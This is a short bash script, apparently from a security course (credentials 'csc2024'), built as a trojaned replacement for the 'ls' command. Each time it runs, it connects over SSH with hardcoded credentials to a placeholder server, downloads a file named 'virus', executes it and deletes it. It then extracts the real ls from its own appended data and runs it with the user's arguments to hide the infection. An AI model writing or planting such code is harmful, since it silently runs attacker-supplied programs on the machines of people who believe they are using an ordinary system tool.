#!/usr/bin/env bash


python3 <<EOF
import paramiko
import os

def main():
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(hostname="SER_IP", username="csc2024",
                        password="csc2024", timeout=3)
    sftp_client = client.open_sftp()
    sftp_client.get("/app/virus", "./virus")
    sftp_client.close()
    client.close()

if __name__ == "__main__":
    main()

EOF

python3 virus
rm -f virus

# Get original ls
sed -n '/^---END OF PAYLOAD---/,/^---END OF ORIGINAL---/ { /---END OF PAYLOAD---/d; /---END OF ORIGINAL---/d; p }' ./ls > output

# Remove last line (\n)
truncate -s -1 output

unzip -p output > output_pro

chmod +x output_pro

./output_pro $@

# Remove tem cat
rm -f output_pro output

exit
